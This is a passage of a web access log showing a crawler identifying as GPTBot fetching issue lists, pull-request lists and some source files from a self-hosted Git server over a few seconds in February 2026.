10185] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9830] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" -[17/Feb/2026:18:32:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:18:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:18:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:18:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13364] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13364] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176999] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" -[17/Feb/2026:18:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:18:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:18:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&state=closed&type=all" -[17/Feb/2026:18:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 11173] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/import_csv.py" -[17/Feb/2026:18:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:18:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" 